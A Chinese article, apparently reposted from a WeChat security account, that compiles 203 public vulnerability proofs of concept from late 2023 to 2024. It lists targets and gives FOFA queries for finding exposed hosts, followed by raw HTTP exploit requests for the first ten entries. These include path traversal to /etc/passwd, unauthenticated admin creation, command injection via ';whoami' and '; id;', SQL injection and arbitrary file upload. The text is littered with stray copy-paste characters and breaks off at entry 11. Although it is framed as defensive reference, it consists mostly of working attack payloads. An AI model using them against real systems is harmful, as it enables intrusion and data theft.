互联网公开漏洞整理202309-202406
" y& m9 g, W; T. _( N道一安全 2024-06-05 07:41 北京) I9 e* d7 v5 a, f
以下文章来源于网络安全新视界 ,作者网络安全新视界* g2 L" f: W1 ]) U' v) v: {/ \* r
, p, u, @$ F- ~# Y+ \$ k发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。, }9 I; U, [4 y& P3 l: c' v
* I/ R! L- U6 O1 e漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
/ s v% P4 B0 A1 k1 _1 O& O- B/ Z
( Z7 s5 n O& G& k& Z安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
) e" M/ s) B- t& r6 S* f
0 V- T8 Y! x) ~5 W, B# I5 W3 a文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。5 b7 c8 u' G* q6 \. o
/ B! e- a4 n$ v- W合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
4 V+ @5 y% s% c: Q# ]4 c8 }( P" @0 U3 L( H' m5 J
h5 ]3 ?: \; g* [& l) Y
声明 }# D1 f! z4 v8 g, i8 `1 K
3 h& b- ^4 l7 k- T/ k& Z6 G为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。: N6 N7 W% t9 d8 s6 Z
+ G/ c! {7 Q: q+ c: W2 ?
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
0 {2 i" j# J9 [) k+ C5 F; `$ b( ~6 B g! @
- ^+ L! U2 r. ^1 T
) i; _7 W0 u: Z+ {; [! e. J
目录; L" x# d5 B2 v B& n- G
/ N. C: r- Y, V6 q X$ P01
( J, p5 |3 [) J& H6 m! w' p5 {; n7 Z* j4 h' ?
1. StarRocks MPP数据库未授权访问
) W, V: b6 F, H2. Casdoor系统static任意文件读取
- u! R4 \. E4 m/ l/ B1 Y4 y/ p3. EasyCVR智能边缘网关 userlist 信息泄漏
6 e! ?! {+ d) O& V/ K& E4. EasyCVR视频管理平台存在任意用户添加
8 [% s! w7 W( f* a' ^2 j5. NUUO NVR 视频存储管理设备远程命令执行
4 s4 q0 g Y& m, v6. 深信服 NGAF 任意文件读取
% [& i$ P5 O5 b# a5 h9 z" e7. 鸿运主动安全监控云平台任意文件下载! \6 m! k. D5 d1 e
8. 斐讯 Phicomm 路由器RCE
( v& o6 f* g9 r4 R ~9 s9. 稻壳CMS keyword 未授权SQL注入# L& J8 V& T \) X$ q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ v6 o3 ^) S5 P* {5 u( M11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
7 \2 X Y/ V' w5 N: s7 A12. Jorani < 1.0.2 远程命令执行4 N2 Y1 B n9 ~; c: i2 g7 H7 b/ L
13. 红帆iOffice ioFileDown任意文件读取$ v" k# X/ H& K: J
14. 华夏ERP(jshERP)敏感信息泄露! \# w0 {! K! o% O) |" B
15. 华夏ERP getAllList信息泄露
& B' W" h! z$ e7 O16. 红帆HFOffice医微云SQL注入
7 J5 X0 c# ^! U/ n4 [% n6 Q: c17. 大华 DSS itcBulletin SQL 注入, }; u8 B* }6 h6 M
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 n6 Q6 a+ {0 F: s! G ?) s! f; I' t
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. {- \) w* Q, K* o( n5 x. C
20. 大华ICC智能物联综合管理平台任意文件读取
4 x# X% D9 P8 w$ x# N' k4 O7 t21. 大华ICC智能物联综合管理平台random远程代码执行
5 o3 }# H6 ]$ T" Z+ j22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( c# y v$ e: y* P( t* _1 [) U. h23. 大华ICC智能物联综合管理平台 fastjson远程代码执行. H3 n9 P9 \. s1 O* D6 w0 G! j
24. 用友NC 6.5 accept.jsp任意文件上传# u5 ?; E9 k; B K; V
25. 用友NC registerServlet JNDI 远程代码执行
: U- L/ v8 w" I7 r26. 用友NC linkVoucher SQL注入- N3 T( \' c" {6 d" B, M# s# {6 `
27. 用友 NC showcontent SQL注入
) k& _, r+ }! v- `7 D28. 用友NC grouptemplet 任意文件上传* b- ^, V, t V; f: z* z) X$ h: o
29. 用友NC down/bill SQL注入& H- O2 U* F* X$ G. k* c- t
30. 用友NC importPml SQL注入
& V1 ~9 f! Z2 \3 t+ B31. 用友NC runStateServlet SQL注入
+ ^" {8 P+ \3 U; _8 z32. 用友NC complainbilldetail SQL注入
% y6 L6 v V: B& T5 x5 f33. 用友NC downTax/download SQL注入; y* |0 M, o4 K& S
34. 用友NC warningDetailInfo接口SQL注入) s/ z" l" R/ J% Y
35. 用友NC-Cloud importhttpscer任意文件上传
2 G# n0 h7 c& P5 h7 \% E% \36. 用友NC-Cloud soapFormat XXE D( Q, H) L' {4 a, ^
37. 用友NC-Cloud IUpdateService XXE
3 G X, @3 ^2 {8 e38. 用友U8 Cloud smartweb2.RPC.d XXE
# x$ I O, k' J% w9 X% E4 L0 L39. 用友U8 Cloud RegisterServlet SQL注入
& S5 T Q' p4 I" w% K% V40. 用友U8-Cloud XChangeServlet XXE
1 a/ h$ x) p. }3 f; c41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
( T% p o$ ?( p+ ~. H% `42. 用友GRP-U8 SmartUpload01 文件上传, ]5 P& r9 v. W- E
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: A/ \" h4 m7 F44. 用友GRP-U8 bx_dj_check.jsp SQL注入, B" y8 [1 s& E8 t+ j9 C; z* O: {
45. 用友GRP-U8 ufgovbank XXE
8 Y# I4 J! s# z `! y) k0 u46. 用友GRP-U8 sqcxIndex.jsp SQL注入
6 F. L8 _# O8 a7 N47. 用友GRP A++Cloud 政府财务云 任意文件读取
' Y. \# I/ o: ~; c% |3 Z9 `/ @48. 用友U8 CRM swfupload 任意文件上传7 L# E @5 F: n$ H8 [- u0 y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
/ O/ g1 Y4 r$ K" Q- ]5 P# J50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ U" S/ q: K: u; ^0 L7 G51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
# P" X+ ]( _3 p; y% M6 L( @$ h1 }1 U52. 泛微E-Office json_common.php sql注入
* I- R$ l/ Q1 o2 c53. 迪普 DPTech VPN Service 任意文件上传: S2 A9 Y4 Q+ j! r/ C O! W# n& S9 O
54. 畅捷通T+ getstorewarehousebystore 远程代码执行. p" w3 R: P4 H3 I
55. 畅捷通T+ getdecallusers信息泄露
, d* K. `7 r. `; {3 g56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE6 I# s( O6 Q2 _
57. 畅捷通T+ keyEdit.aspx SQL注入, s+ E7 Z$ N1 b. z+ h% H
58. 畅捷通T+ KeyInfoList.aspx sql注入
0 A6 E+ e4 R& C) k' q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行6 @7 l6 z8 S$ x7 `# W
60. 百卓Smart管理平台 importexport.php SQL注入, o5 y, h( W% F ^ [) W
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
5 t% g: j5 e6 u9 u62. IP-guard WebServer 远程命令执行
/ U5 V8 Y8 b7 e63. IP-guard WebServer任意文件读取
/ H3 f. Q) N" E5 m64. 捷诚管理信息系统CWSFinanceCommon SQL注入7 U, e3 i% j9 m; e. L
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过: {. K0 C' W# \
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 ~. T: x3 c* G% h3 P3 n; N9 Z
67. 万户ezOFFICE wpsservlet任意文件上传
" K& `7 Y/ p: V4 Q# m68. 万户ezOFFICE wf_printnum.jsp SQL注入% f; n- E, \$ B. y3 |4 V
69. 万户 ezOFFICE contract_gd.jsp SQL注入+ a" Y. b1 O3 ?0 }9 K, u) V
70. 万户ezEIP success 命令执行
* ~) ^2 \# t, x71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# g( [* \$ t: `: K; b( ?* V+ E0 V72. 致远OA getAjaxDataServlet XXE$ m3 M0 |8 _1 X6 N" o7 N/ J
73. GeoServer wms远程代码执行* W4 x4 u/ V* A; T3 d2 m; A( g( m. B
74. 致远M3-server 6_1sp1 反序列化RCE
: x, _- d& `0 z9 K U75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: e( T$ k7 R- u0 L0 S, z. U
76. 新开普掌上校园服务管理平台service.action远程命令执行 t' m4 ^$ G; U6 u8 P/ O
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! x/ i' \; o+ x! w4 C) H9 j78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 i; i6 C3 J7 J/ K2 o6 r
79. BYTEVALUE 百为流控路由器远程命令执行1 R; J, g- t9 t' e0 G
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传% O* L# O. L; ^* d2 K
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 m( R1 F0 f4 k5 p
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行& _ d" r5 g2 U+ E0 I
83. JeecgBoot testConnection 远程命令执行% }6 y/ A+ j; h" W, Z9 ?) R0 K; Z" x+ K
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- o6 @9 _, Y9 T$ L% V
85. SysAid On-premise< 23.3.36远程代码执行8 Z7 I/ b1 C q, k
86. 日本tosei自助洗衣机RCE
2 ` f+ M# a# @5 `) U9 Y87. 安恒明御安全网关aaa_local_web_preview文件上传: M A7 Q# R5 n, u# Q
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- H7 Z+ m. h) z8 n' |9 F
89. 致远互联FE协作办公平台editflow_manager存在sql注入
- J# E, \" O$ m5 |90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
; C# B# v. x r8 ]; Z1 h8 N# S* n/ ?91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
5 J5 v6 e% B& |% y92. 海康威视运行管理中心session命令执行
; w9 v# e/ g6 j93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
6 C$ r: @# s: @2 V% [- h9 o* L4 [6 X94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% F( J( p ?0 c
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 Y4 O+ n2 B, S9 \
96. Apache OFBiz 18.12.11 groovy 远程代码执行7 _, J& b; |- J0 W' B" [
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 {) X9 {, R, @/ [: O$ {4 b/ F98. SpiderFlow爬虫平台远程命令执行2 r! o% V/ o: `( d0 I E7 i
99. Ncast盈可视高清智能录播系统busiFacade RCE
! O; E! j4 s$ K100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
( {; K0 B' `- t4 D P) B8 V: u101. ivanti policy secure-22.6命令注入
: G6 M* a6 U; W: j" z' N- l102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
. f2 K" e0 h% X103. Ivanti Pulse Connect Secure VPN XXE& Q, F0 I" J" i, N8 }9 X8 j
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
5 i3 {) ~* m) w105. SpringBlade v3.2.0 export-user SQL 注入
8 Z2 K7 S" ^9 X% g0 a0 s& ]106. SpringBlade dict-biz/list SQL 注入
* h) E7 `: I' H107. SpringBlade tenant/list SQL 注入 Q& }* X, ~8 s3 c Q
108. D-Tale 3.9.0 SSRF- L4 _# q1 E! D
109. Jenkins CLI 任意文件读取) v& V% \; F2 z9 I' |% O( L! j
110. Goanywhere MFT 未授权创建管理员
8 ^% Q: Q& k! {2 X( g( y1 C111. WordPress Plugin HTML5 Video Player SQL注入
' m: w3 ?+ x# ^; Y/ m8 a! \! \112. WordPress Plugin NotificationX SQL 注入" T) e5 w$ n, b6 H2 w) h) A
113. WordPress Automatic 插件任意文件下载和SSRF" S6 U$ U% Y% w* V/ e
114. WordPress MasterStudy LMS插件 SQL注入" B& o" b% \2 |& L7 a: A' A
115. WordPress Bricks Builder <= 1.9.6 RCE
* \8 i: m; u- N! N, Y) K* N, _& r: X116. wordpress js-support-ticket文件上传
7 D9 b5 P! D& W+ e/ q117. WordPress LayerSlider插件SQL注入
; x1 L* \+ c: Z" C/ H118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ e& I, Y5 X0 x1 Z4 T$ u! B
119. 北京百绰智能S20后台sysmanageajax.php sql注入
) F: M0 k$ Q! W120. 北京百绰智能S40管理平台导入web.php任意文件上传# \& u% Q* R5 z& L: C# n) N0 h
121. 北京百绰智能S42管理平台userattestation.php任意文件上传7 w h% e$ ]+ j0 E
122. 北京百绰智能s200管理平台/importexport.php sql注入
* ?. n. o/ D& ~* c& a123. Atlassian Confluence 模板注入代码执行7 n4 t6 J3 E3 ~! y
124. 湖南建研工程质量检测系统任意文件上传
; q) Y5 {7 t% ]4 o! r' \125. ConnectWise ScreenConnect身份验证绕过9 c0 U% d5 x8 \
126. Aiohttp 路径遍历4 r% ~; {" G, D, d) U
127. 广联达Linkworks DataExchange.ashx XXE7 J G6 F/ Q9 z
128. Adobe ColdFusion 反序列化8 I$ b* c D; E o* h, d6 r5 j8 w7 _/ b
129. Adobe ColdFusion 任意文件读取
6 k0 T- |8 a- D. @9 ^+ O130. Laykefu客服系统任意文件上传
! M! T% H- K* L8 R5 `131. Mini-Tmall <=20231017 SQL注入
5 q I8 l8 E. s132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# Q4 P6 u( `) c. y9 H# V
133. H5 云商城 file.php 文件上传7 L' ]6 f4 G9 u+ P. j9 D, C
134. 网康NS-ASG应用安全网关index.php sql注入
; Z) s) e" ^' [135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入/ x/ i0 k0 ]7 i9 ]. l- R/ ?
136. NextChat cors SSRF) z; _& h4 s6 ~& ^
137. 福建科立迅通信指挥调度平台down_file.php sql注入
# P9 _$ E$ C0 a8 S5 u5 C$ T138. 福建科立讯通信指挥调度平台pwd_update.php sql注入; [3 g" u4 P6 r; m/ N7 a
139. 福建科立讯通信指挥调度平台editemedia.php sql注入1 q! z$ W9 { a9 }8 z/ `
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入# ^5 H. w# X& ^$ n0 S3 M0 E8 l; X7 g
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% T9 w" [: X7 [, R! h {
142. CMSV6车辆监控平台系统中存在弱密码
; G+ [+ T; {- }7 ^4 O6 ?4 N143. Netis WF2780 v2.1.40144 远程命令执行0 n# t4 t+ D) Q7 W- z
144. D-Link nas_sharing.cgi 命令注入, ]) r# {0 d; h
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. _# k3 V# F+ v Y; P0 z
146. MajorDoMo thumb.php 未授权远程代码执行
. J- w# \, v1 K9 k% h9 |$ v) k- X! d147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 n% _6 p% h% v, L+ C, X0 ]148. CrushFTP 认证绕过模板注入
$ @; P1 o4 }) B% L( ?) h3 l149. AJ-Report开源数据大屏存在远程命令执行8 K% D% B' @. _8 i+ M
150. AJ-Report 1.4.0 认证绕过与远程代码执行
& d7 Y/ {# Z2 H+ G6 R151. AJ-Report 1.4.1 pageList sql注入
9 d$ Z J8 K6 a7 Y" `152. Progress Kemp LoadMaster 远程命令执行
) H( N5 [- W9 h8 A' |- i153. gradio任意文件读取
) `# N, b) ?0 j( b154. 天维尔消防救援作战调度平台 SQL注入4 S- O7 g) {. T" z3 e+ m* n3 H3 T
155. 六零导航页 file.php 任意文件上传9 ]& p# Z% x. B- i% h$ t/ c4 _
156. TBK DVR-4104/DVR-4216 操作系统命令注入3 o7 Z/ W4 O3 l/ ]
157. 美特CRM upload.jsp 任意文件上传
5 ]7 K& p* h6 i158. Mura-CMS-processAsyncObject存在SQL注入( I0 a( n$ A# A V# R
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
1 H* p% s/ [1 Z3 P160. Sonatype Nexus Repository 3目录遍历与文件读取" L+ K4 c% B% w9 W" n) v
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
k! G+ o5 V, I2 r' U5 {% `/ Y9 s162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" X# e1 Y: J0 t/ D0 F
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传, ~9 y& w( _' F* }8 r/ B
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传' e8 i1 _ z9 N! U
165. OrangeHRM 3.3.3 SQL 注入2 w( s9 W" r* E* z1 c
166. 中成科信票务管理平台SeatMapHandler SQL注入
8 S' w5 n& e! t) I u% x& L. e167. 精益价值管理系统 DownLoad.aspx任意文件读取
d0 d# e: p9 [4 S; i+ m$ m- O168. 宏景EHR OutputCode 任意文件读取: D5 |* {5 w$ l+ \( H; l" e1 D' t0 Y
169. 宏景EHR downlawbase SQL注入
, K/ G+ J' P& b; D9 Z170. 宏景EHR DisplayExcelCustomReport 任意文件读取
$ P5 V: E9 x* r, c, C171. 通天星CMSV6车载定位监控平台 SQL注入
" B( f; D4 Y. k7 \2 C. l! `172. DT-高清车牌识别摄像机任意文件读取$ t: G& H" o, y, p, R4 S6 ]
173. Check Point 安全网关任意文件读取# z% V) O3 V: V, M
174. 金和OA C6 FileDownLoad.aspx 任意文件读取8 W% L! v: M6 d. ^ m5 {
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入, }' p, z" W, t1 N ~) i' B
176. 电信网关配置管理系统 rewrite.php 文件上传
7 n* v$ v! V6 c$ E6 Q3 C# w m177. H3C路由器敏感信息泄露
( [9 S w3 D6 f2 ~, w; d, d6 I$ k178. H3C校园网自助服务系统-flexfileupload-任意文件上传
B+ D, P! ?# D- P179. 建文工程管理系统存在任意文件读取
5 R: f( H: k1 Q# L- V4 ~180. 帮管客 CRM jiliyu SQL注入
, _% V8 w6 r, U3 p3 p# W* d181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* j- X7 ]$ c2 [5 _( e182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
8 [: [2 A7 f+ D, ]183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. m/ m8 D5 X0 L% b0 B5 W$ {
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
5 }# r$ k: z9 k7 ~185. 瑞友天翼应用虚拟化系统SQL注入# k4 r( Q5 j* J+ L- f% _+ f% o% E
186. F-logic DataCube3 SQL注入4 A! h% `6 |+ L# K
187. Mura CMS processAsyncObject SQL注入
$ |; q: U( l" `- U/ h188. 叁体-佳会视频会议 attachment 任意文件读取0 h( }+ J# u8 B) W- ~
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
4 A7 y" K" C1 b: ~4 T190. 短视频矩阵营销系统 poihuoqu 任意文件读取
7 X' L( c" H7 b; \- {191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
; a; K' G% i. j8 m" A# H192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
; |8 j6 B9 P+ D0 G y193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行- e1 I9 J; y+ L% ]' _3 I8 x
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传" A$ @( k }0 |# `( b" S+ l
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行 I1 F% r1 D. E; M+ x( z$ Q: w! U% e
196. 河南省风速科技统一认证平台密码重置
9 B( A9 V1 M% M; `197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# r; i3 O, @* C% T3 ~198. 阿里云盘 WebDAV 命令注入
$ z0 b1 w! q$ m4 ?199. cockpit系统assetsmanager_upload接口 文件上传" a6 L( `$ A: l5 p: G" n+ {' C
200. SeaCMS海洋影视管理系统dmku SQL注入2 k) k8 s5 J" e0 u/ v& U
201. 方正全媒体新闻采编系统 binary SQL注入
2 Y o( O8 R- O d' f202. 微擎系统 AccountEdit任意文件上传
1 r: b. d+ l" h) ~# S# L203. 红海云EHR PtFjk 文件上传# h" f) Y- z- a* y2 J& M7 s- Q
0 ]; ?6 T" [1 A" c& \" j: ]POC列表
$ E4 Q" R6 C1 |' P
; T$ A# b1 t+ {. J; J02$ o4 K; p: n4 ]1 M) [7 F& b
1 \# w B P) N" S4 R1. StarRocks MPP数据库未授权访问
5 p: B/ s8 e6 F7 t' A" G+ uFOFA :title="StarRocks"
I; C! y+ g, w0 _. y- HGET /mem_tracker HTTP/1.1
7 A4 Z: N" w% a1 c' ~, \& {2 YHost: URL
3 I' ?0 Y; \- v$ X- _/ u- x# y L/ }: `) l
Q# n) `. y' {) J0 M+ X- y2. Casdoor系统static任意文件读取
, v3 ]# ^+ Q: GFOFA :title="Casdoor"
0 A. G8 W7 n; ^GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1, `: F* ~9 h- h7 G* h
Host: xx.xx.xx.xx:99995 v( a) l# q/ v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: K" I* W! x4 A* a- c' c
Connection: close" a4 H; a( G. c W9 x( ?
Accept: */*
2 M W2 w% Z' Y/ Q" W1 HAccept-Language: en9 W8 [7 n0 R* Y9 ^
Accept-Encoding: gzip
/ x! ^$ j! i" A$ J3 B5 {
0 p6 X$ [6 a! y5 F$ V
( Q. F- y+ G6 F) z8 U0 A" N4 o% J; A3. EasyCVR智能边缘网关 userlist 信息泄漏" T& h" m4 |% [* @5 o/ X L
FOFA :title="EasyCVR"/ {& B3 F/ S; E% s; @- O
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1! u7 n# a) A# V5 p- o
Host: xx.xx.xx.xx5 v# {( v3 X N9 b3 `
0 P+ a$ n+ ~/ d4 S; D/ _- n) z
/ `. o# V U6 U4. EasyCVR视频管理平台存在任意用户添加- _& m5 N/ b5 }# S% U
FOFA :title="EasyCVR"
' G6 F( |! t$ A) G: z9 r$ U
$ _9 q& D. l7 _8 I9 Ipassword更改为自己的密码md5
+ ?$ q. f# V8 N2 l" G5 T+ xPOST /api/v1/adduser HTTP/1.1
- O* F& U. ]2 k# l6 v; U+ U5 ^4 jHost: your-ip" o6 l& Y2 U9 e
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 Q; c% E2 e8 L j( x7 j0 R/ D7 l- `& v$ ` x. ?+ ?; M
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=16 Z8 `* M& z; p7 a. | b
" m* }- t, O. C1 O; s
) N+ K, f8 j7 w% A* r( J5. NUUO NVR 视频存储管理设备远程命令执行
, S+ I8 d: u# S% p; v& WFOFA:title="Network Video Recorder Login"- X4 E2 h: T8 X' `, s" e7 H
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
0 w* C- M5 Z) y+ s+ d; Z" cHost: xx.xx.xx.xx m9 m& l1 Y) d7 _ s. Q0 O
/ d, s( O: m( L( E
0 b1 Q+ j' V2 G* K4 @6. 深信服 NGAF 任意文件读取
* A5 z2 c+ o- G) C sFOFA:title="SANGFOR | NGAF"" N# V4 ^- ~2 w! x6 J, P: V
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
. Q; ?6 O3 `+ N' l- e [; `Host:
; j# f4 U0 S1 I/ u* H6 ^
: g! y" c8 w) u6 _- H; d& O" q3 v( }2 H& o" H7 j
7. 鸿运主动安全监控云平台任意文件下载
; ?" c' x- Z/ m, zFOFA:body="./open/webApi.html"
8 A9 _1 P! G, w \$ d, G* o6 i0 ZGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.17 L k: D ~( z! l8 B" V9 o
Host:: ]4 a5 ^7 U3 y# q0 I8 b1 V
# J( z* J$ L/ T
]. p6 Q, w" |* \* l# ^
8. 斐讯 Phicomm 路由器RCE
, _, X: I9 Q1 D: w6 R4 P7 F y; ?- ZFOFA:icon_hash="-1344736688"# F8 F; S5 y! Y6 i- a
默认账号admin登录后台后,执行操作
, M& [, G5 L1 S6 M" m$ QPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.17 t0 e/ J. s% @. f1 F- b' N' e
Host: x.x.x.x* t+ m' x1 h/ B% Y
Cookie: sysauth=第一步登录获取的cookie
5 C1 Q2 \$ P- B7 | ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
" }" f4 c: M9 EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% Y6 O& J2 d9 T ?1 l
7 A' }! n0 W& o5 G6 _+ M------WebKitFormBoundaryxbgjoytz5 r% O v, e* i5 a; w: }$ [
Content-Disposition: form-data; name="wifiRebootEnablestatus"- Z0 A: a) f% R2 ?& m9 b
C( F- e; _" ]9 ~! D* g%s
7 X6 R( p8 [- }------WebKitFormBoundaryxbgjoytz
0 o) {* j. y: VContent-Disposition: form-data; name="wifiRebootrange"2 q+ }. F4 x: r- w
' ?, Z Y2 n1 ?2 `9 H" {& F* C
12:00; id;0 i/ C8 X. l8 q6 [
------WebKitFormBoundaryxbgjoytz& T% k- r& B5 z$ A2 {+ Z0 L% e
Content-Disposition: form-data; name="wifiRebootendrange"4 C2 p4 W! k* u$ V. v% D/ F
2 A; a% Y0 F" `# }$ m$ t
%s:
4 K4 ]' }8 j6 F, |* E5 _ x------WebKitFormBoundaryxbgjoytz
& ~6 a3 r- f! _. a: k4 R2 _Content-Disposition: form-data; name="cururl2"& h7 j& m/ n* W8 D4 n5 k- o3 g
Y; Q2 s" U* r# s" Q+ y* g
$ L. r# g4 B3 F2 r1 U+ e
------WebKitFormBoundaryxbgjoytz--
/ O% S$ N$ D% ^ A1 @* g4 a5 e9 ]/ h& R; z& m/ J2 ~: a4 A
8 P! F: a3 n2 R. B6 X. v3 l) E9. 稻壳CMS keyword 未授权SQL注入
! C7 a2 K, A+ j# L lFOFA:app="Doccms"% i5 N5 ^% a! y3 W" n: p& o
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
( d# m* H, W M3 G8 j% q$ F) z4 I- zHost: x.x.x.x
) v9 b3 I5 G2 n' o; x
- Q: U0 {. n$ i, C, K
' w6 M1 N( z9 ^& H. O, _; Ypayload为下列语句的二次Url编码0 e {% {) Q& L3 I
0 j' y3 J6 W0 y) ^
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#- v) F" [/ R* t: [0 y" ]$ S1 |* I g
k- @& Z) J2 |6 W8 w: m! ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传4 D1 [3 {1 t( z h6 z: C
FOFA:icon_hash="953405444"; Q& Y. q: W, R8 S- X
4 _7 E) g3 G# w, v. e- q1 @' a文件上传后响应中包含上传文件的路径5 \4 W' D6 p \, r0 b% Q
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
) L) v: s5 L( T$ L1 t, ^/ @Host: x.x.x.x:xx( k4 }! y9 h! q) X9 D* c1 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.367 | l: Q* t3 z+ ~* s2 Q0 V+ z9 W
Content-Length: 197
0 @: d6 N$ E8 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( v! Q+ i V( J3 S
Accept-Encoding: gzip, deflate
# J* i) E3 D4 [/ Y" H7 ?Accept-Language: zh-CN,zh;q=0.9" C8 N1 Y( P# v% Z/ y. W4 d
Connection: close" h# f5 @6 |( D; C/ Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
: Y' x7 G% j7 N+ S2 t
7 m" a: p g4 p------WebKitFormBoundaryxdgaqmqu
1 V& V# q+ G$ J. S+ C- fContent-Disposition: form-data; name="file"filename="icfitnya.txt"
~5 R5 ^7 [+ Z- a4 _7 V0 s0 o AContent-Type: text/html. X2 y _! H. [ i W$ F
8 Q- e* n- m8 t# G _jmnqjfdsupxgfidopeixbgsxbf' E: w w& r5 q2 N T: \: \
------WebKitFormBoundaryxdgaqmqu--; M! e) {/ d9 \
& v, i$ u, P" A& A0 e' E- K5 R$ {& s, u( `3 u" v. Z
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
; Y. r: {9 l9 y* c0 B8 v5 _2 n+ `- PFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
